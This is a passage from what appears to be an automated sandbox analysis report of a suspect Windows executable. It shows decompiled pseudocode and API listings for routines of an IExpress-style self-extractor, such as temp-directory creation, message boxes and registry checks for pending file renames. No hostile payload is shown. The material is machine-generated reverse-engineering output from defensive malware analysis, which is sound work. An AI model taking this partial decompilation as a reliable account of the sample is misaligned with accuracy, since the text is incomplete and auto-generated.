                                                											_t82 = 0x3891e4;
                                                											_t70 = E00382630(0, 0x3891e4, 1);
                                                											__eflags = _t70;
                                                											if(_t70 != 0) {
                                                												goto L19;
                                                											} else {
                                                												_t101 = 1;
                                                												_t82 = 0x3891e4;
                                                												_t71 = E00385467(0x3891e4, 1, 1);
                                                												__eflags = _t71;
                                                												if(_t71 != 0) {
                                                													goto L45;
                                                												} else {
                                                													do {
                                                														goto L19;
                                                														L43:
                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                														_push(4);
                                                														_t101 = 3;
                                                														_t82 =  &_v268;
                                                														_t44 = E0038597D(_t82, _t101, 1);
                                                														__eflags = _t44;
                                                													} while (_t44 != 0);
                                                													goto L2;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							__eflags = _t35 - 0x5c;
                                                							if(_t35 != 0x5c) {
                                                								L10:
                                                								_t72 = 1;
                                                							} else {
                                                								__eflags =  *0x388b3f - _t35; // 0x0
                                                								_t72 = 0;
                                                								if(__eflags != 0) {
                                                									goto L10;
                                                								}
                                                							}
                                                							_t101 = 0;
                                                							_t73 = E00385467(0x388b3e, 0, _t72);
                                                							__eflags = _t73;
                                                							if(_t73 != 0) {
                                                								L45:
                                                								_t38 = 1;
                                                							} else {
                                                								_t101 = 0x4be;
                                                								E003844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                								goto L2;
                                                							}
                                                						}
                                                					} else {
                                                						_t101 = 0x4b1;
                                                						E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						LocalFree(_t109);
                                                						 *0x389124 = 0x80070714;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					_t101 = 0x4b5;
                                                					E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					 *0x389124 = E00386285();
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				L47:
                                                				return E00386CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                			}





































                                                0x003855ab
                                                0x003855b2
                                                0x003855c9
                                                0x003855d5
                                                0x003855d9
                                                0x00385600
                                                0x00385605
                                                0x0038560a
                                                0x0038560c
                                                0x00385638
                                                0x00385641
                                                0x00385643
                                                0x00385645
                                                0x00385645
                                                0x0038564c
                                                0x00385652
                                                0x00385657
                                                0x00385659
                                                0x00385696
                                                0x0038569c
                                                0x0038589f
                                                0x003858a7
                                                0x003858ac
                                                0x003858b3
                                                0x003858b5
                                                0x003856a2
                                                0x003856a2
                                                0x003856a8
                                                0x00000000
                                                0x003856ae
                                                0x003856ae
                                                0x003856b9
                                                0x003856bf
                                                0x003856c1
                                                0x003856f3
                                                0x003856f3
                                                0x00385705
                                                0x0038570a
                                                0x00385711
                                                0x00385717
                                                0x00385724
                                                0x00385726
                                                0x00385729
                                                0x00385730
                                                0x00385737
                                                0x0038573d
                                                0x00385740
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038572b
                                                0x0038572b
                                                0x0038572e
                                                0x00385742
                                                0x00385742
                                                0x00385745
                                                0x0038576b
                                                0x0038576b
                                                0x00000000
                                                0x00385747
                                                0x00385747
                                                0x0038574d
                                                0x0038574f
                                                0x00385771
                                                0x00385771
                                                0x00385773
                                                0x00000000
                                                0x00385751
                                                0x00385751
                                                0x00385753
                                                0x00000000
                                                0x00385755
                                                0x0038575b
                                                0x00385760
                                                0x00385762
                                                0x00000000
                                                0x00385764
                                                0x00385764
                                                0x00385769
                                                0x0038577e
                                                0x0038577e
                                                0x00385781
                                                0x00385788
                                                0x0038578d
                                                0x0038578f
                                                0x003857b2
                                                0x003857b8
                                                0x003857bd
                                                0x003857bf
                                                0x003857cd
                                                0x003857cd
                                                0x003857dd
                                                0x003857e3
                                                0x003857ef
                                                0x003857f5
                                                0x003857f8
                                                0x0038580a
                                                0x0038580a
                                                0x003857fa
                                                0x00385802
                                                0x00385802
                                                0x0038580d
                                                0x0038580f
                                                0x00385830
                                                0x00385836
                                                0x0038583d
                                                0x0038584b
                                                0x00385851
                                                0x00385855
                                                0x0038585a
                                                0x0038585c
                                                0x00000000
                                                0x0038585e
                                                0x0038585e
                                                0x00000000
                                                0x0038585e
                                                0x00385811
                                                0x00385817
                                                0x00385819
                                                0x0038581f
                                                0x00000000
                                                0x0038581f
                                                0x00385791
                                                0x00385797
                                                0x0038579c
                                                0x0038579e
                                                0x00000000
                                                0x003857a0
                                                0x003857a9
                                                0x003857ae
                                                0x003857b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x003857b0
                                                0x0038579e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385769
                                                0x00385762
                                                0x00385753
                                                0x0038574f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038572e
                                                0x00000000
                                                0x00385864
                                                0x00385864
                                                0x00385864
                                                0x00385717
                                                0x00000000
                                                0x003856c3
                                                0x003856c5
                                                0x003856c9
                                                0x003856ce
                                                0x003856d0
                                                0x00000000
                                                0x003856d6
                                                0x003856d6
                                                0x003856d8
                                                0x003856dd
                                                0x003856df
                                                0x00000000
                                                0x003856e1
                                                0x003856e2
                                                0x003856e4
                                                0x003856e6
                                                0x003856eb
                                                0x003856ed
                                                0x00000000
                                                0x003856f3
                                                0x003856f3
                                                0x00000000
                                                0x0038586c
                                                0x00385878
                                                0x0038587e
                                                0x00385882
                                                0x00385883
                                                0x00385889
                                                0x0038588e
                                                0x0038588e
                                                0x00000000
                                                0x00385896
                                                0x003856ed
                                                0x003856df
                                                0x003856d0
                                                0x003856c1
                                                0x003856a8
                                                0x0038565b
                                                0x0038565b
                                                0x0038565d
                                                0x00385669
                                                0x00385669
                                                0x0038565f
                                                0x0038565f
                                                0x00385665
                                                0x00385667
                                                0x00000000
                                                0x00000000
                                                0x00385667
                                                0x0038566c
                                                0x00385673
                                                0x00385678
                                                0x0038567a
                                                0x0038589b
                                                0x0038589b
                                                0x00385680
                                                0x00385685
                                                0x0038568c
                                                0x00000000
                                                0x0038568c
                                                0x0038567a
                                                0x0038560e
                                                0x00385613
                                                0x0038561a
                                                0x00385620
                                                0x00385626
                                                0x00000000
                                                0x00385626
                                                0x003855db
                                                0x003855e0
                                                0x003855e7
                                                0x003855f1
                                                0x003855f6
                                                0x003855f6
                                                0x003855f6
                                                0x003858b7
                                                0x003858c7

                                                APIs
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003855CF
                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00385638
                                                • LocalFree.KERNEL32(00000000), ref: 0038564C
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00385620
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                  • Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285
                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 003856B9
                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0038571E
                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00385737
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003857CD
                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003857EF
                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00385802
                                                  • Part of subcall function 00382630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00382654
                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00385830
                                                  • Part of subcall function 00386517: FindResourceA.KERNEL32(00380000,000007D6,00000005), ref: 0038652A
                                                  • Part of subcall function 00386517: LoadResource.KERNEL32(00380000,00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00386538
                                                  • Part of subcall function 00386517: DialogBoxIndirectParamA.USER32(00380000,00000000,00000547,003819E0,00000000), ref: 00386557
                                                  • Part of subcall function 00386517: FreeResource.KERNEL32(00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00386560
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00385878
                                                  • Part of subcall function 0038597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003859A8
                                                  • Part of subcall function 0038597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003859AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                • API String ID: 2436801531-559629209
                                                • Opcode ID: f6671a2aba6d27c60d087dbfee8ba140c67baf03da7c5ca3cbe5369cb85d98e4
                                                • Instruction ID: 8a17121d12eb5c87ac972dd8322183ca32be21d6856c26ce3f5b6953179407dd
                                                • Opcode Fuzzy Hash: f6671a2aba6d27c60d087dbfee8ba140c67baf03da7c5ca3cbe5369cb85d98e4
                                                • Instruction Fuzzy Hash: 558129B0B04B059BEB23BB718C85BFE72AD9B60300F5400E6F586D6191EFB48DC68B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 3844b9-3844f8 407 384679-38467b 406->407 408 3844fe-384525 LoadStringA 406->408 411 38467c-38468c call 386ce0 407->411 409 384562-384568 408->409 410 384527-38452e call 38681f 408->410 412 38456b-384570 409->412 420 38453f 410->420 421 384530-38453d call 3867c9 410->421 412->412 415 384572-38457c 412->415 418 3845c9-3845cb 415->418 419 38457e-384580 415->419 424 3845cd-3845cf 418->424 425 384607-384617 LocalAlloc 418->425 422 384583-384588 419->422 426 384544-384554 MessageBoxA 420->426 421->420 421->426 422->422 429 38458a-38458c 422->429 431 3845d2-3845d7 424->431 427 38455a-38455d 425->427 428 38461d-384628 call 381680 425->428 426->427 427->411 435 38462d-38463d MessageBeep call 38681f 428->435 433 38458f-384594 429->433 431->431 434 3845d9-3845ed LocalAlloc 431->434 433->433 436 384596-3845ad LocalAlloc 433->436 434->427 437 3845f3-384605 call 38171e 434->437 444 38464e 435->444 445 38463f-38464c call 3867c9 435->445 436->427 439 3845af-3845c7 call 38171e 436->439 437->435 439->435 448 384653-384677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                C-Code - Quality: 94%
                                                			E003844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                				signed int _v8;
                                                				char _v64;
                                                				char _v576;
                                                				void* _v580;
                                                				struct HWND__* _v584;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				void* _t37;
                                                				signed int _t39;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				signed int _t49;
                                                				signed int _t52;
                                                				void* _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				int _t64;
                                                				void* _t66;
                                                				intOrPtr* _t67;
                                                				signed int _t69;
                                                				intOrPtr* _t73;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t77;
                                                				void* _t80;
                                                				void* _t81;
                                                				void* _t82;
                                                				intOrPtr* _t84;
                                                				void* _t85;
                                                				signed int _t89;
                                                
                                                				_t75 = __edx;
                                                				_t34 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t34 ^ _t89;
                                                				_v584 = __ecx;
                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                				_t67 = _a4;
                                                				_t69 = 0xd;
                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                				_t80 = _t83 + _t69 + _t69;
                                                				_v580 = _t37;
                                                				asm("movsb");
                                                				if(( *0x388a38 & 0x00000001) != 0) {
                                                					_t39 = 1;
                                                				} else {
                                                					_v576 = 0;
                                                					LoadStringA( *0x389a3c, _t75,  &_v576, 0x200);
                                                					if(_v576 != 0) {
                                                						_t73 =  &_v576;
                                                						_t16 = _t73 + 1; // 0x1
                                                						_t75 = _t16;
                                                						do {
                                                							_t43 =  *_t73;
                                                							_t73 = _t73 + 1;
                                                						} while (_t43 != 0);
                                                						_t84 = _v580;
                                                						_t74 = _t73 - _t75;
                                                						if(_t84 == 0) {
                                                							if(_t67 == 0) {
                                                								_t27 = _t74 + 1; // 0x2
                                                								_t83 = _t27;
                                                								_t44 = LocalAlloc(0x40, _t83);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									_t75 = _t83;
                                                									_t74 = _t80;
                                                									E00381680(_t80, _t83,  &_v576);
                                                									goto L23;
                                                								}
                                                							} else {
                                                								_t76 = _t67;
                                                								_t24 = _t76 + 1; // 0x1
                                                								_t85 = _t24;
                                                								do {
                                                									_t55 =  *_t76;
                                                									_t76 = _t76 + 1;
                                                								} while (_t55 != 0);
                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                								_t83 = _t25 + _t74;
                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									E0038171E(_t80, _t83,  &_v576, _t67);
                                                									goto L23;
                                                								}
                                                							}
                                                						} else {
                                                							_t77 = _t67;
                                                							_t18 = _t77 + 1; // 0x1
                                                							_t81 = _t18;
                                                							do {
                                                								_t58 =  *_t77;
                                                								_t77 = _t77 + 1;
                                                							} while (_t58 != 0);
                                                							_t75 = _t77 - _t81;
                                                							_t82 = _t84 + 1;
                                                							do {
                                                								_t59 =  *_t84;
                                                								_t84 = _t84 + 1;
                                                							} while (_t59 != 0);
                                                							_t21 = _t74 + 0x64; // 0x65
                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                							_t80 = _t44;
                                                							if(_t80 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(_v580);
                                                								E0038171E(_t80, _t83,  &_v576, _t67);
                                                								L23:
                                                								MessageBeep(_a12);
                                                								if(E0038681F(_t67) == 0) {
                                                									L25:
                                                									_t49 = 0x10000;
                                                								} else {
                                                									_t54 = E003867C9(_t74, _t74);
                                                									_t49 = 0x190000;
                                                									if(_t54 == 0) {
                                                										goto L25;
                                                									}
                                                								}
                                                								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16); // executed
                                                								_t83 = _t52;
                                                								LocalFree(_t80);
                                                								_t39 = _t52;
                                                							}
                                                						}
                                                					} else {
                                                						if(E0038681F(_t67) == 0) {
                                                							L4:
                                                							_t64 = 0x10010;
                                                						} else {
                                                							_t66 = E003867C9(0, 0);
                                                							_t64 = 0x190010;
                                                							if(_t66 == 0) {
                                                								goto L4;
                                                							}
                                                						}
                                                						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
                                                						L6:
                                                						_t39 = _t44 | 0xffffffff;
                                                					}
                                                				}
                                                				return E00386CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                			}



































                                                0x003844b9
                                                0x003844c4
                                                0x003844cb
                                                0x003844d8
                                                0x003844e4
                                                0x003844eb
                                                0x003844ee
                                                0x003844ef
                                                0x003844ef
                                                0x003844f1
                                                0x003844f7
                                                0x003844f8
                                                0x0038467b
                                                0x003844fe
                                                0x00384509
                                                0x00384518
                                                0x00384525
                                                0x00384562
                                                0x00384568
                                                0x00384568
                                                0x0038456b
                                                0x0038456b
                                                0x0038456d
                                                0x0038456e
                                                0x00384572
                                                0x00384578
                                                0x0038457c
                                                0x003845cb
                                                0x00384607
                                                0x00384607
                                                0x0038460d
                                                0x00384613
                                                0x00384617
                                                0x00000000
                                                0x0038461d
                                                0x00384623
                                                0x00384626
                                                0x00384628
                                                0x00000000
                                                0x00384628
                                                0x003845cd
                                                0x003845cd
                                                0x003845cf
                                                0x003845cf
                                                0x003845d2
                                                0x003845d2
                                                0x003845d4
                                                0x003845d5
                                                0x003845db
                                                0x003845de
                                                0x003845e3
                                                0x003845e9
                                                0x003845ed
                                                0x00000000
                                                0x003845f3
                                                0x003845fd
                                                0x00000000
                                                0x00384602
                                                0x003845ed
                                                0x0038457e
                                                0x0038457e
                                                0x00384580
                                                0x00384580
                                                0x00384583
                                                0x00384583
                                                0x00384585
                                                0x00384586
                                                0x0038458a
                                                0x0038458c
                                                0x0038458f
                                                0x0038458f
                                                0x00384591
                                                0x00384592
                                                0x0038459b
                                                0x0038459e
                                                0x003845a3
                                                0x003845a9
                                                0x003845ad
                                                0x00000000
                                                0x003845af
                                                0x003845af
                                                0x003845bf
                                                0x0038462d
                                                0x00384630
                                                0x0038463d
                                                0x0038464e
                                                0x0038464e
                                                0x0038463f
                                                0x00384640
                                                0x00384647
                                                0x0038464c
                                                0x00000000
                                                0x00000000
                                                0x0038464c
                                                0x00384666
                                                0x0038466d
                                                0x0038466f
                                                0x00384675
                                                0x00384675
                                                0x003845ad
                                                0x00384527
                                                0x0038452e
                                                0x0038453f
                                                0x0038453f
                                                0x00384530
                                                0x00384531
                                                0x00384538
                                                0x0038453d
                                                0x00000000
                                                0x00000000
                                                0x0038453d
                                                0x00384554
                                                0x0038455a
                                                0x0038455a
                                                0x0038455a
                                                0x00384525
                                                0x0038468c

                                                APIs
                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                • MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 003845A3
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 003845E3
                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0038460D
                                                • MessageBeep.USER32(00000000), ref: 00384630
                                                • MessageBoxA.USER32(?,00000000,lega,00000000), ref: 00384666
                                                • LocalFree.KERNEL32(00000000), ref: 0038466F
                                                  • Part of subcall function 0038681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0038686E
                                                  • Part of subcall function 0038681F: GetSystemMetrics.USER32(0000004A), ref: 003868A7
                                                  • Part of subcall function 0038681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003868CC
                                                  • Part of subcall function 0038681F: RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,?,0000000C), ref: 003868F4
                                                  • Part of subcall function 0038681F: RegCloseKey.ADVAPI32(?), ref: 00386902
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                • String ID: LoadString() Error. Could not load string resource.$lega
                                                • API String ID: 3244514340-2134167237
                                                • Opcode ID: 8b15f1728f65de412f137dc52429449e99b712129b54d21c39cacc597c51f590
                                                • Instruction ID: 0ca4c375208ba1d058c40e1af25ac8beddc0ca79534d5492d5c51d0867804a5a
                                                • Opcode Fuzzy Hash: 8b15f1728f65de412f137dc52429449e99b712129b54d21c39cacc597c51f590
                                                • Instruction Fuzzy Hash: E751D07290031AABDB23AF28CC48BAA7B69EF46300F1541D5FD09A7641DB759E05CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 95%
                                                			E003853A1(CHAR* __ecx, CHAR* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t5;
                                                				long _t13;
                                                				int _t14;
                                                				CHAR* _t20;
                                                				int _t29;
                                                				int _t30;
                                                				CHAR* _t32;
                                                				signed int _t33;
                                                				void* _t34;
                                                
                                                				_t5 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t5 ^ _t33;
                                                				_t32 = __edx;
                                                				_t20 = __ecx;
                                                				_t29 = 0;
                                                				while(1) {
                                                					E0038171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                					_t34 = _t34 + 0x10;
                                                					_t29 = _t29 + 1;
                                                					E00381680(_t32, 0x104, _t20);
                                                					E0038658A(_t32, 0x104,  &_v268); // executed
                                                					RemoveDirectoryA(_t32); // executed
                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                					if(_t13 == 0xffffffff) {
                                                						break;
                                                					}
                                                					if(_t29 < 0x190) {
                                                						continue;
                                                					}
                                                					L3:
                                                					_t30 = 0;
                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                						_t30 = 1;
                                                						DeleteFileA(_t32);
                                                						CreateDirectoryA(_t32, 0);
                                                					}
                                                					L5:
                                                					return E00386CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                				}
                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                				if(_t14 == 0) {
                                                					goto L3;
                                                				}
                                                				_t30 = 1;
                                                				 *0x388a20 = 1;
                                                				goto L5;
                                                			}

















                                                0x003853ac
                                                0x003853b3
                                                0x003853b9
                                                0x003853bb
                                                0x003853bd
                                                0x003853bf
                                                0x003853d1
                                                0x003853d6
                                                0x003853e0
                                                0x003853e2
                                                0x003853f5
                                                0x003853fb
                                                0x00385402
                                                0x0038540b
                                                0x00000000
                                                0x00000000
                                                0x00385413
                                                0x00000000
                                                0x00000000
                                                0x00385415
                                                0x00385416
                                                0x00385427
                                                0x0038542a
                                                0x0038542b
                                                0x00385434
                                                0x00385434
                                                0x0038543a
                                                0x0038544c
                                                0x0038544c
                                                0x00385452
                                                0x0038545a
                                                0x00000000
                                                0x00000000
                                                0x0038545e
                                                0x0038545f
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0038171E: _vsnprintf.MSVCRT ref: 00381750
                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003853FB
                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385402
                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038541F
                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038542B
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385434
                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385452
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                • API String ID: 1082909758-2659685179
                                                • Opcode ID: 23e5d8543ab5da734e8a5aed5bec92987df16e8ed2645e05e795f2a1103643c5
                                                • Instruction ID: f7a4c9123e7a9b6b209e801ed5346611e10d226358083e2bcf16d8a010618f81
                                                • Opcode Fuzzy Hash: 23e5d8543ab5da734e8a5aed5bec92987df16e8ed2645e05e795f2a1103643c5
                                                • Instruction Fuzzy Hash: 7E1104B1300B0467E322BB369C49FEF366DEBC1311F0000E6F646D7190CEB4894287A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 38256d-38257d 564 382622-382627 call 3824e0 563->564 565 382583-382589 563->565 569 382629-38262f 564->569 566 3825e8-382607 RegOpenKeyExA 565->566 567 38258b 565->567 571 382609-382620 RegQueryInfoKeyA 566->571 572 3825e3-3825e6 566->572 567->569 570 382591-382595 567->570 570->569 574 38259b-3825ba RegOpenKeyExA 570->574 575 3825d1-3825dd RegCloseKey 571->575 572->569 574->572 576 3825bc-3825cb RegQueryValueExA 574->576 575->572 576->575
                                                C-Code - Quality: 86%
                                                			E0038256D(signed int __ecx) {
                                                				int _v8;
                                                				void* _v12;
                                                				signed int _t13;
                                                				signed int _t19;
                                                				long _t24;
                                                				void* _t26;
                                                				int _t31;
                                                				void* _t34;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t13 = __ecx & 0x0000ffff;
                                                				_t31 = 0;
                                                				if(_t13 == 0) {
                                                					_t31 = E003824E0(_t26);
                                                				} else {
                                                					_t34 = _t13 - 1;
                                                					if(_t34 == 0) {
                                                						_v8 = 0;
                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                							goto L7;
                                                						} else {
                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                							goto L6;
                                                						}
                                                						L12:
                                                					} else {
                                                						if(_t34 > 0 && __ecx <= 3) {
                                                							_v8 = 0;
                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                							if(_t24 == 0) {
                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                								L6:
                                                								asm("sbb eax, eax");
                                                								_v8 = _v8 &  !( ~_t19);
                                                								RegCloseKey(_v12); // executed
                                                							}
                                                							L7:
                                                							_t31 = _v8;
                                                						}
                                                					}
                                                				}
                                                				return _t31;
                                                				goto L12;
                                                			}











                                                0x00382572
                                                0x00382573
                                                0x00382575
                                                0x00382578
                                                0x0038257d
                                                0x00382627
                                                0x00382583
                                                0x00382586
                                                0x00382589
                                                0x003825eb
                                                0x00382607
                                                0x00000000
                                                0x00382609
                                                0x0038261a
                                                0x00000000
                                                0x0038261a
                                                0x00000000
                                                0x0038258b
                                                0x0038258b
                                                0x0038259e
                                                0x003825b2
                                                0x003825ba
                                                0x003825cb
                                                0x003825d1
                                                0x003825d6
                                                0x003825da
                                                0x003825dd
                                                0x003825dd
                                                0x003825e3
                                                0x003825e3
                                                0x003825e3
                                                0x0038258b
                                                0x00382589
                                                0x0038262f
                                                0x00000000

                                                APIs
